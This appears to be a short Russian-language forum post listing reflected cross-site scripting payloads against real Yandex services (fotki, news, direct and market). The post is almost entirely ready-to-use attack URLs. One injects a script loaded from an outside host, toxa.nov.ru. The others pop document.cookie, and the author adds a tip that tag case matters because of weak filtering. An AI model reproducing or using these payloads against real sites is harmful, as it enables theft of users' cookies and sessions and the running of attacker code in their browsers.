Яндекс.Xss

PHP:

http://fotki.yandex.ru/actions/favorites-add.xml?author=lalala%22%3E%3Cscript%20src=%22http://toxa.nov.ru/s.js%22%3E%3C/script%3E


 

И есчо XSS
news.yandex.ru

Code:

http://news.yandex.ru/yandsearch?cl4url=&country="><script>alert(document.cookie)</script>

Вот собственно XSS
direct.yandex.ru

Code:

http://direct.yandex.ru/search?text=<h1><big>хек =\\</big></h1><script>alert(document.cookie)</script>

И есчо ...

market.yandex.ru
Поиск:

Code:

<SCRIPT> alert(document.cookie); </SCRIPT>

!Регистр имеет значение, ибо, хоть и слабая, но фильтрация!

Code:

http://market.yandex.ru/search.xml?cvredirect=1&text=<SCRIPT> alert(document.cookie); </SCRIPT>